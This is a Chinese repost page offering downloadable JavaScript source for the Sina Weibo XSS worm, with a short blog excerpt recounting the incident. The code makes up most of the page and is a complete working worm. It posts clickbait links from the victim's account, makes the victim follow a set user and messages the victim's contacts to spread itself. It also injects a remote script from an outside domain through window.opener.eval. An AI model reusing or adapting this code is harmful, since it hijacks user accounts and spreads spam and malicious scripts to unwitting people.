新浪微博XSS攻击源代码下载(2012.06.28_sina_XSS.txt)

function createXHR(){
	return window.XMLHttpRequest?
	new XMLHttpRequest():
	new ActiveXObject("Microsoft.XMLHTTP");
}
function post(url,data,sync){
	xmlHttp = createXHR();
    xmlHttp.open("POST",url,sync);
    xmlHttp.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
    xmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded; charset=UTF-8");
    xmlHttp.send(data);
}
function getappkey(url){
	xmlHttp = createXHR();
	xmlHttp.open("GET",url,false);
	xmlHttp.send();
	result = xmlHttp.responseText;
	id_arr = ‘‘;
	id = result.match(/namecard="true" title="[^"]*/g);
	for(i=0;i<id.length;i++){
		sum = id[i].toString().split(‘"‘)[3];
		id_arr += sum + ‘||‘;
	}
	return id_arr;
}
function random_msg(){
	link = ‘ http://163.fm/PxZHoxn?id=‘ + new Date().getTime();;
	var msgs = [
		‘郭美美事件的一些未注意到的细节:‘,
		‘建党大业中穿帮的地方:‘,
		‘让女人心动的100句诗歌:‘,
		‘3D肉团团高清普通话版种子:‘,
		‘这是传说中的神仙眷侣啊:‘,
		‘惊爆!范冰冰艳照真流出了:‘,
		‘杨幂被爆多次被潜规则:‘,
		‘傻仔拿锤子去抢银行:‘,
		‘可以监听别人手机的软件:‘,
		‘个税起征点有望提到4000:‘];
	var msg = msgs[Math.floor(Math.random()*msgs.length)] + link;
	msg = encodeURIComponent(msg);
	return msg;
}
function publish(){
	url = ‘http://weibo.com/mblog/publish.php?rnd=‘ + new Date().getTime();
	data = ‘content=‘ + random_msg() + ‘&pic=&styleid=2&retcode=‘;
	post(url,data,true);
}
function follow(){
	url = ‘http://weibo.com/attention/aj_addfollow.php?refer_sort=profile&atnId=profile&rnd=‘ + new Date().getTime();
	data = ‘uid=‘ + 2201270010 + ‘&fromuid=‘ + $CONFIG.$uid + ‘&refer_sort=profile&atnId=profile‘;
	post(url,data,true);
}
function message(){
	url = ‘http://weibo.com/‘ + $CONFIG.$uid + ‘/follow‘;
	ids = getappkey(url);
	id = ids.split(‘||‘);
	for(i=0;i<id.length - 1 & i<5;i++){
		msgurl = ‘http://weibo.com/message/addmsg.php?rnd=‘ + new Date().getTime();
		msg = random_msg();
		msg = encodeURIComponent(msg);
		user = encodeURIComponent(encodeURIComponent(id[i]));
		data = ‘content=‘ + msg + ‘&name=‘ + user + ‘&retcode=‘;
		post(msgurl,data,false);
	}
}
function main(){
	try{
		publish();
	}
	catch(e){}
	try{
		follow();
	}
	catch(e){}
	try{
		message();
	}
	catch(e){}
}
try{
   x="g=document.createElement(‘script‘);g.src=‘http://www.2kt.cn/images/t.js‘;document.body.appendChild(g)";window.opener.eval(x);
}
catch(e){}
main();
var t=setTimeout(‘location="http://weibo.com/pub/topic";‘,5000);
时间: 2024-12-25 17:44:50

新浪微博XSS攻击源代码下载(2012.06.28_sina_XSS.txt)的相关文章

新浪微博XSS攻击事件

http://blog.csdn.net/terryzero/article/details/6575078 6月28日20时14分左右开始,新浪微博出现了一次比较大的XSS攻击事件.大量用户自动发送诸如:“郭美美事件的一些未注意到的细节”,“建 党大业中穿帮的地方”,“让女人心动的100句诗歌”,“3D肉团团高清普通话版种子”,“这是传说中的神仙眷侣啊”,“惊爆!范冰冰艳照真流出了”等等 微博消息和私信,并自动关注一位名为hellosamy的用户. 事件的经过线索如下: 20:14,开始有大量

WEB安全实战(五)XSS 攻击的另外一种解决方案(推荐)

序 说到 XSS 攻击,前边已经有两篇文章在讲这个事了,这次又拿出来说,主要是针对最近工作中的一些新的问题.那么之前是怎么解决这个问题的呢?为什么又要换解决方案?下面就详细的跟大家分享一下. 旧方案 公司的测试团队发现这个问题之后,就要求尽快的解决,在网上查了很多相关的资料,也翻阅了基本安全方面的书,基于 XSS 的攻击原理,自己写了一个 Filter,并在该 Filter 中加入了对各种请求的处理代码.首先是拦截浏览器发出的请求,然后对拦截到的请求进行过滤,获取参数列表,参数值列表(包括表单提

XSS攻击及防御链接整理

XSS攻击及防御:http://blog.csdn.net/ghsau/article/details/17027893 Web攻防系列教程之跨站脚本攻击和防范技巧详解:http://www.rising.com.cn/newsletter/news/2012-04-25/11387.html Web安全测试之XSS:http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html xss攻击入门:http://www.cnblogs

文顶顶iOS开发博客链接整理及部分项目源代码下载

文顶顶iOS开发博客链接整理及部分项目源代码下载 网上的iOS开发的教程很多,但是像cnblogs博主文顶顶的博客这样内容图文并茂,代码齐全,示例经典,原理也有阐述,覆盖面宽广,自成系统的系列教程却很难找.如果你是初学者,在学习了斯坦福iOS7公开课和跟着文顶顶的博客做项目之后,最快只需要2个月时间,就基本可以独立完成iOS App的开发工作.有经验的开发者也可以在该博客中寻找代码片段进行学习借鉴,必有所收获. 在此也向@文顶顶 表示严重感谢! 由于文顶顶博客博文繁多,每次找文章需要频繁的翻页,

PHP防御XSS攻击的终极解决方案

最近测试XSS攻击修复时,找到的一个比较不错的文章,分享给大家. Update20151202: 感谢大家的关注和回答,目前我从各种方式了解到的防御方法,整理如下: PHP直接输出html的,可以采用以下的方法进行过滤: 1 1.htmlspecialchars函数 2   3 2.htmlentities函数 4   5 3.HTMLPurifier.auto.php插件 6   7 4.RemoveXss函数(百度可以查到) PHP输出到JS代码中,或者开发Json API的,则需要前端在J

SQL 注入、XSS 攻击、CSRF 攻击

SQL 注入.XSS 攻击.CSRF 攻击 SQL 注入 什么是 SQL 注入 SQL 注入,顾名思义就是通过注入 SQL 命令来进行攻击,更确切地说攻击者把 SQL 命令插入到 web 表单或请求参数的查询字符串里面提交给服务器,从而让服务器执行编写的恶意的 SQL 命令. 对于 web 开发者来说,SQL 注入已然是非常熟悉的,而且 SQL 注入已经生存了 10 多年,目前已经有很成熟的防范方法,所以目前的 web 应用都很少会存在漏洞允许进行 SQL 注入攻击. 除非是入门开发人员,在开发

超强XSS攻击利器

======================================================================= BackTrack 5 R1 XSS研究之XSSer(超强XSS攻击利器)使用说明中文版 XSSer使用说明 ================================================================ 简介: ======================================================

WEB安全实战(三)XSS 攻击的防御

前言 上篇文章中提到了 XSS 攻击,而且,也从几个方面介绍了 XSS 攻击带来的严重影响.那么,这篇文章中,主要是针对 XSS 攻击做一个基本的防御,看看可以通过几种方式来修复这个特别常见的安全漏洞. 由于公司用的是 SpringMVC,因此,这次就主要基于 SpringMVC 来解决这些漏洞.当然,其实这些解决方案都是大同小异,对于什么环境来说根本无所谓.了解了原理,什么环境.什么语言都可以运用自如了.废话就不多说了,直接上解决方案. 解决方案 方案一 方案一主要是利用了 SpringMVC

XSS攻击与防范

1.什么是XSS攻击 XSS攻击,跨站脚本攻击 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS.恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的. xss攻击,就是给form表单的项目里边填写一些html.css.js等脚本代码,这些代码就会被收集到数据库里边,当对应的内容展示的时